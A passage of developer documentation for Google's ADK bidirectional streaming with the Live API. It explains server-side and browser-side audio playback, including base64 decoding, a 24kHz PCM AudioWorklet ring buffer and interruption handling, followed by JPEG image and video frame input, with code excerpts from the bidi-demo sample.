raw bytes (24kHz, 16-bit PCM, mono) audio_bytes = part.inline_data.data # Your logic to stream audio to client await stream_audio_to_client(audio_bytes) # Or save to file # with open("output.pcm", "ab") as f: # f.write(audio_bytes) ``` Automatic Base64 Decoding The Live API wire protocol transmits audio data as base64-encoded strings. The google.genai types system uses Pydantic's base64 serialization feature (`val_json_bytes='base64'`) to automatically decode base64 strings into bytes when deserializing API responses. When you access `part.inline_data.data`, you receive ready-to-use bytes—no manual base64 decoding needed. #### Handling Audio Events at the Client The bidi-demo uses a different architectural approach: instead of processing audio on the server, it forwards all events (including audio data) to the WebSocket client and handles audio playback in the browser. This pattern separates concerns—the server focuses on ADK event streaming while the client handles media playback using Web Audio API. Demo implementation: [main.py:225-233](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L225-L233) ```python # The bidi-demo forwards all events (including audio) to the WebSocket client async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) await websocket.send_text(event_json) ``` **Demo Implementation (Client - JavaScript):** The client-side implementation involves three components: WebSocket message handling, audio player setup with AudioWorklet, and the AudioWorklet processor itself. Demo implementation: [app.js:638-688](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L640-L690) ```javascript // 1. WebSocket Message Handler // Handle content events (text or audio) if (adkEvent.content && adkEvent.content.parts) { const parts = adkEvent.content.parts; for (const part of parts) { // Handle inline data (audio) if (part.inlineData) { const mimeType = part.inlineData.mimeType; const data = part.inlineData.data; // Check if this is audio PCM data and the audio player is ready if (mimeType && mimeType.startsWith("audio/pcm") && audioPlayerNode) { // Decode base64 to ArrayBuffer and send to AudioWorklet for playback audioPlayerNode.port.postMessage(base64ToArray(data)); } } } } // Decode base64 audio data to ArrayBuffer function base64ToArray(base64) { // Convert base64url to standard base64 (RFC 4648 compliance) // base64url uses '-' and '_' instead of '+' and '/', which are URL-safe let standardBase64 = base64.replace(/-/g, '+').replace(/_/g, '/'); // Add padding '=' characters if needed // Base64 strings must be multiples of 4 characters while (standardBase64.length % 4) { standardBase64 += '='; } // Decode base64 string to binary string using browser API const binaryString = window.atob(standardBase64); const len = binaryString.length; const bytes = new Uint8Array(len); // Convert each character code (0-255) to a byte for (let i = 0; i < len; i++) { bytes[i] = binaryString.charCodeAt(i); } // Return the underlying ArrayBuffer (binary data) return bytes.buffer; } ``` Demo implementation: [audio-player.js:5-24](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/audio-player.js#L5-L24) ```javascript // 2. Audio Player Setup // Start audio player worklet export async function startAudioPlayerWorklet() { // Create an AudioContext with 24kHz sample rate // This matches the Live API's output audio format (16-bit PCM @ 24kHz) // Note: Different from input rate (16kHz) - Live API outputs at higher quality const audioContext = new AudioContext({ sampleRate: 24000 }); // Load the AudioWorklet module that will handle audio playback // AudioWorklet runs on audio rendering thread for smooth, low-latency playback const workletURL = new URL('./pcm-player-processor.js', import.meta.url); await audioContext.audioWorklet.addModule(workletURL); // Create an AudioWorkletNode using our custom PCM player processor // This node will receive audio data via postMessage and play it through speakers const audioPlayerNode = new AudioWorkletNode(audioContext, 'pcm-player-processor'); // Connect the player node to the audio destination (speakers/headphones) // This establishes the audio graph: AudioWorklet → AudioContext.destination audioPlayerNode.connect(audioContext.destination); return [audioPlayerNode, audioContext]; } ``` Demo implementation: [pcm-player-processor.js:5-76](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/pcm-player-processor.js#L5-L76) ```javascript // 3. AudioWorklet Processor (Ring Buffer) // AudioWorklet processor that buffers and plays PCM audio class PCMPlayerProcessor extends AudioWorkletProcessor { constructor() { super(); // Initialize ring buffer (24kHz x 180 seconds = ~4.3 million samples) // Ring buffer absorbs network jitter and ensures smooth playback this.bufferSize = 24000 * 180; this.buffer = new Float32Array(this.bufferSize); this.writeIndex = 0; // Where we write new audio data this.readIndex = 0; // Where we read for playback // Handle incoming messages from main thread this.port.onmessage = (event) => { // Reset buffer on interruption (e.g., user interrupts model response) if (event.data.command === 'endOfAudio') { this.readIndex = this.writeIndex; // Clear the buffer by jumping read to write position return; } // Decode Int16 array from incoming ArrayBuffer // The Live API sends 16-bit PCM audio data const int16Samples = new Int16Array(event.data); // Add audio data to ring buffer for playback this._enqueue(int16Samples); }; } // Push incoming Int16 data into ring buffer _enqueue(int16Samples) { for (let i = 0; i < int16Samples.length; i++) { // Convert 16-bit integer to float in [-1.0, 1.0] required by Web Audio API // Divide by 32768 (max positive value for signed 16-bit int) const floatVal = int16Samples[i] / 32768; // Store in ring buffer at current write position this.buffer[this.writeIndex] = floatVal; // Move write index forward, wrapping around at buffer end (circular buffer) this.writeIndex = (this.writeIndex + 1) % this.bufferSize; // Overflow handling: if write catches up to read, move read forward // This overwrites oldest unplayed samples (rare, only under extreme network delay) if (this.writeIndex === this.readIndex) { this.readIndex = (this.readIndex + 1) % this.bufferSize; } } } // Called by Web Audio system automatically ~128 samples at a time // This runs on the audio rendering thread for precise timing process(inputs, outputs, parameters) { const output = outputs[0]; const framesPerBlock = output[0].length; for (let frame = 0; frame < framesPerBlock; frame++) { // Write samples to output buffer (mono to stereo) output[0][frame] = this.buffer[this.readIndex]; // left channel if (output.length > 1) { output[1][frame] = this.buffer[this.readIndex]; // right channel (duplicate for stereo) } // Move read index forward unless buffer is empty (underflow protection) if (this.readIndex != this.writeIndex) { this.readIndex = (this.readIndex + 1) % this.bufferSize; } // If readIndex == writeIndex, we're out of data - output silence (0.0) } return true; // Keep processor alive (return false to terminate) } } registerProcessor('pcm-player-processor', PCMPlayerProcessor); ``` **Key Implementation Patterns:** 1. **Base64 Decoding**: The server sends audio data as base64-encoded strings in JSON. The client must decode to ArrayBuffer before passing to AudioWorklet. Handle both standard base64 and base64url encoding. 1. **24kHz Sample Rate**: The AudioContext must be created with `sampleRate: 24000` to match Live API output format (different from 16kHz input). 1. **Ring Buffer Architecture**: Use a circular buffer to handle variable network latency and ensure smooth playback. The buffer stores Float32 samples and handles overflow by overwriting oldest data. 1. **PCM16 to Float32 Conversion**: Live API sends 16-bit signed integers. Divide by 32768 to convert to Float32 in range [-1.0, 1.0] required by Web Audio API. 1. **Mono to Stereo**: The processor duplicates mono audio to both left and right channels for stereo output, ensuring compatibility with all audio devices. 1. **Interruption Handling**: On interruption events, send `endOfAudio` command to clear the buffer by setting `readIndex = writeIndex`, preventing playback of stale audio. This architecture ensures smooth, low-latency audio playback while handling network jitter and interruptions gracefully. ## How to Use Image and Video Both images and video in ADK Bidi-streaming are processed as JPEG frames. Rather than typical video streaming using HLS, mp4, or H.264, ADK uses a straightforward frame-by-frame image processing approach where both static images and video frames are sent as individual JPEG images. **Image/Video Specifications:** - **Format**: JPEG (`image/jpeg`) - **Frame rate**: 1 frame per second (1 FPS) recommended maximum - **Resolution**: 768x768 pixels (recommended) Demo implementation: [main.py:202-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L202-L217) ```python # Decode base64 image data image_data = base64.b64decode(json_message["data"]) mime_type = json_message.get("mimeType", "image/jpeg") # Send image as blob image_blob = types.Blob( mime_type=mime_type, data=image_data ) live_request_queue.send_realtime(image_blob) ``` **Not Suitable For**: - **Real-time video action recognition** - 1 FPS is too slow to capture rapid movements or actions - **Live sports analysis or motion tracking** - Insufficient temporal resolution for fast-moving subjects **Example Use Case for Image Processing**: In the [Shopper's Concierge demo](https://youtu.be/LwHPYyw7u6U?si=lG9gl9aSIuu-F4ME&t=40), the application uses `send_realtime()` to send the user-uploaded image. The agent recognizes the context from the image and searches for relevant items on the e-commerce site. ### Handling Image Input at the Client In browser-based applications, capturing images from the user's webcam and sending them to the server requires using the MediaDevices API to access the camera, capturing frames to a canvas, and converting to JPEG format. The bidi-demo demonstrates how to open a camera preview modal, capture a single frame, and send it as base64-encoded JPEG to the WebSocket server. **Architecture:** 1. **Camera access**: Use `navigator.mediaDevices.getUserMedia()` to access webcam 1. **Video preview**: Display live camera feed in a `